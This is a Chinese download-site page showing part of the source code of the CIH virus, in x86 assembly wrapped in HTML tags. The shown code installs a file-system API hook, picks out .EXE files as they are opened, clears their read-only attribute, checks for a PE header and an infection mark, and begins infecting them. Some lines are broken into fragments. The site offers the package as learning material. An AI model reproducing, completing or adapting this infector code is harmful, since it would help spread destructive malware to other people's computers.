首页 › 资源下载 › 其他 › CIH源代码 › 源码查看
cih源代码.htm

来自「CIH源代码」· HTM 代码 · 共 1,695 行 · 第 1/5 页
HTM
1,695 行
      <P>push 000000001h ;</P>
      <P>push 000000002h ;</P>
      <P>int 20h ; VMMCALL _PageAllocate</P>
      <P>_PageAllocate = $ ;</P>
      <P>dd 00010053h ; Use EAX, ECX, EDX, and flags</P>
      <P>add esp, 08h*04h</P>
      <P>　</P>
      <P>xchg edi, eax ; EDI = SystemMemory Start Addr</P>
      <P>s</P>
      <P>　</P>
      <P>lea eax, MyVirusStart-@2[esi]</P>
      <P>　</P>
      <P>iretd ; Return to Ring3 Initial Program</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Install My File System Api Hook *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>InstallMyFileSystemApiHook:</P>
      <P>　</P>
      <P>lea eax, FileSystemApiHook-@6[edi]</P>
      <P>　</P>
      <P>push eax ;</P>
      <P>int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook</P>
      <P>IFSMgr_InstallFileSystemApiHook = $ ;</P>
      <P>dd 00400067h ; Use EAX, ECX, EDX, and flags</P>
      <P>　</P>
      <P>mov dr0, eax ; Save OldFileSystemApiHook Add</P>
      <P>ss</P>
      <P>　</P>
      <P>pop eax ; EAX = FileSystemApiHook Address</P>
      <P>　</P>
      <P>; Save Old IFSMgr_InstallFileSystemApiHook Entry Point</P>
      <P>mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]</P>
      <P>mov edx, [ecx]</P>
      <P>mov OldInstallFileSystemApiHook-@3[eax], edx</P>
      <P>　</P>
      <P>; Modify IFSMgr_InstallFileSystemApiHook Entry Point</P>
      <P>lea eax, InstallFileSystemApiHook-@3[eax]</P>
      <P>mov [ecx], eax</P>
      <P>　</P>
      <P>cli</P>
      <P>　</P>
      <P>jmp ExitRing0Init</P>
      <P>　</P>
      <P>; *********************************************************</P>
      <P>; * Code Size of Merge Virus Code Section *</P>
      <P>; *********************************************************</P>
      <P>　</P>
      <P>CodeSizeOfMergeVirusCodeSection = offset $</P>
      <P>　</P>
      <P>; *********************************************************</P>
      <P>; * IFSMgr_InstallFileSystemApiHook *</P>
      <P>; *********************************************************</P>
      <P>　</P>
      <P>InstallFileSystemApiHook:</P>
      <P>push ebx</P>
      <P>　</P>
      <P>call @4 ;</P>
      <P>@4: ;</P>
      <P>pop ebx ; mov ebx, offset FileSystemApiHook</P>
      <P>add ebx, FileSystemApiHook-@4 ;</P>
      <P>　</P>
      <P>push ebx</P>
      <P>int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook</P>
      <P>IFSMgr_RemoveFileSystemApiHook = $</P>
      <P>dd 00400068h ; Use EAX, ECX, EDX, and flags</P>
      <P>pop eax</P>
      <P>　</P>
      <P>; Call Original IFSMgr_InstallFileSystemApiHook</P>
      <P>; to Link Client FileSystemApiHook</P>
      <P>push dword ptr [esp+8]</P>
      <P>call OldInstallFileSystemApiHook-@3[ebx]</P>
      <P>pop ecx</P>
      <P>　</P>
      <P>push eax</P>
      <P>　</P>
      <P>; Call Original IFSMgr_InstallFileSystemApiHook</P>
      <P>; to Link My FileSystemApiHook</P>
      <P>push ebx</P>
      <P>call OldInstallFileSystemApiHook-@3[ebx]</P>
      <P>pop ecx</P>
      <P>　</P>
      <P>mov dr0, eax ; Adjust OldFileSystemApiHook A</P>
      <P>ress</P>
      <P>　</P>
      <P>pop eax</P>
      <P>　</P>
      <P>pop ebx</P>
      <P>　</P>
      <P>ret</P>
      <P>　</P>
      <P>; *********************************************************</P>
      <P>; * Static Data *</P>
      <P>; *********************************************************</P>
      <P>　</P>
      <P>OldInstallFileSystemApiHook dd ?</P>
      <P>　</P>
      <P>; *********************************************************</P>
      <P>; * IFSMgr_FileSystemHook *</P>
      <P>; *********************************************************</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * IFSMgr_FileSystemHook Entry Point *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>FileSystemApiHook:</P>
      <P>@3 = FileSystemApiHook</P>
      <P>　</P>
      <P>pushad</P>
      <P>　</P>
      <P>call @5 ;</P>
      <P>je CallUniToBCSPath</P>
      <P>　</P>
      <P>add al, 40h</P>
      <P>mov ah, ':'</P>
      <P>　</P>
      <P>mov [esi], eax</P>
      <P>　</P>
      <P>inc esi</P>
      <P>inc esi</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * UniToBCSPath *</P>
      <P>; *************************************</P>
      <P>; * This Service Converts *</P>
      <P>; * a Canonicalized Unicode Pathname *</P>
      <P>; * to a Normal Pathname in the *</P>
      <P>; * Specified BCS Character Set. *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>CallUniToBCSPath:</P>
      <P>push 00000000h</P>
      <P>push FileNameBufferSize</P>
      <P>mov ebx, [ebx+10h]</P>
      <P>mov eax, [ebx+0ch]</P>
      <P>add eax, 04h</P>
      <P>push eax</P>
      <P>push esi</P>
      <P>int 20h ; VXDCall UniToBCSPath</P>
      <P>UniToBCSPath = $</P>
      <P>dd 00400041h</P>
      <P>add esp, 04h*04h</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Is FileName '.EXE' !? *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>; cmp [esi+eax-04h], '.EXE'</P>
      <P>cmp [esi+eax-04h], 'EXE.'</P>
      <P>pop esi</P>
      <P>jne DisableOnBusy</P>
      <P>　</P>
      <P>IF DEBUG</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Only for Debug *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>; cmp [esi+eax-06h], 'FUCK'</P>
      <P>cmp [esi+eax-06h], 'KCUF'</P>
      <P>jne DisableOnBusy</P>
      <P>　</P>
      <P>ENDIF</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Is Open Existing File !? *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>; if ( NotOpenExistingFile )</P>
      <P>; goto DisableOnBusy</P>
      <P>cmp word ptr [ebx+18h], 01h</P>
      <P>jne DisableOnBusy</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Get Attributes of the File *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>mov ax, 4300h</P>
      <P>int 20h ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P>IFSMgr_Ring0_FileIO = $</P>
      <P>dd 00400032h</P>
      <P>　</P>
      <P>jc DisableOnBusy</P>
      <P>　</P>
      <P>push ecx</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Get IFSMgr_Ring0_FileIO Address *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]</P>
      <P>mov edi, [edi]</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Is Read-Only File !? *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>test cl, 01h</P>
      <P>jz OpenFile</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Modify Read-Only File to Write *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>mov ax, 4301h</P>
      <P>xor ecx, ecx</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Open File *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>OpenFile:</P>
      <P>xor eax, eax</P>
      <P>mov ah, 0d5h</P>
      <P>xor ecx, ecx</P>
      <P>xor edx, edx</P>
      <P>inc edx</P>
      <P>mov ebx, edx</P>
      <P>inc ebx</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P>　</P>
      <P>xchg ebx, eax ; mov ebx, FileHandle</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Need to Restore *</P>
      <P>; * Attributes of the File !? *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>pop ecx</P>
      <P>　</P>
      <P>pushf</P>
      <P>　</P>
      <P>test cl, 01h</P>
      <P>jz IsOpenFileOK</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Restore Attributes of the File *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>mov ax, 4301h</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Is Open File OK !? *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>IsOpenFileOK:</P>
      <P>popf</P>
      <P>　</P>
      <P>jc DisableOnBusy</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Open File Already Succeed. ^__^ *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>push esi ; Push FileNameBuffer Address to Stack</P>
      <P>　</P>
      <P>pushf ; Now CF = 0, Push Flag to Stack</P>
      <P>　</P>
      <P>add esi, DataBuffer-@7 ; mov esi, offset DataBuffer</P>
      <P>　</P>
      <P>; ***************************</P>
      <P>; * Get OffsetToNewHeader *</P>
      <P>; ***************************</P>
      <P>　</P>
      <P>xor eax, eax</P>
      <P>mov ah, 0d6h</P>
      <P>　</P>
      <P>; For Doing Minimal VirusCode's Length,</P>
      <P>; I Save EAX to EBP.</P>
      <P>mov ebp, eax</P>
      <P>　</P>
      <P>xor ecx, ecx</P>
      <P>mov cl, 04h</P>
      <P>xor edx, edx</P>
      <P>mov dl, 3ch</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P>　</P>
      <P>mov edx, [esi]</P>
      <P>　</P>
      <P>; ***************************</P>
      <P>; * Get 'PE\0' Signature *</P>
      <P>; * of ImageFileHeader, and *</P>
      <P>; * Infected Mark. *</P>
      <P>; ***************************</P>
      <P>　</P>
      <P>dec edx</P>
      <P>　</P>
      <P>mov eax, ebp</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P>　</P>
      <P>; ***************************</P>
      <P>; * Is PE !? *</P>
      <P>; ***************************</P>
      <P>; * Is the File *</P>
      <P>; * Already Infected !? *</P>
      <P>; ***************************</P>
      <P>　</P>
      <P>; cmp [esi], '\0PE\0'</P>
      <P>cmp dword ptr [esi], 00455000h</P>
      <P>jne CloseFile</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * The File is ^o^ *</P>
      <P>; * PE(Portable Executable) indeed. *</P>
      <P>; *************************************</P>
      <P>; * The File isn't also Infected. *</P>
      <P>; *************************************</P>
      <P>　</P>
      <P>; *************************************</P>
      <P>; * Start to Infect the File *</P>
      <P>; *************************************</P>
      <P>; * Registers Use Status Now : *</P>
      <P>; * *</P>
      <P>; * EAX = 04h *</P>
      <P>; * EBX = File Handle *</P>
      <P>; * ECX = 04h *</P>
      <P>; * EDX = 'PE\0\0' Signature of *</P>
      <P>; * ImageFileHeader Pointer's *</P>
      <P>; * Former Byte. *</P>
      <P>; * ESI = DataBuffer Address ==&gt; @8 *</P>
      <P>; * EDI = IFSMgr_Ring0_FileIO Address *</P>
      <P>; * EBP = D600h ==&gt; Read Data in File *</P>
      <P>; *************************************</P>
      <P>; * Stack Dump : *</P>
      <P>; * *</P>
      <P>; * ESP =&gt; ------------------------- *</P>
      <P>; * | EFLAG(CF=0) | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | FileNameBufferPointer | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | EDI | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | ESI | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | EBP | *</P>
      <P>; * ------------------------- *</P>
cih源代码.htm - 源码说明

本页面展示了「CIH源代码」中的 cih源代码.htm 源码文件，采用 HTM 编程语言编写，共 1,695 行代码。您可以在线阅读完整代码内容，也可以返回资源详情页下载完整源码包进行本地学习和开发。
虫虫下载站收录了大量与CIH相关的技术资源，包括源代码、技术文档、电路图等，是电子工程师和嵌入式开发者的专业学习平台。
⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?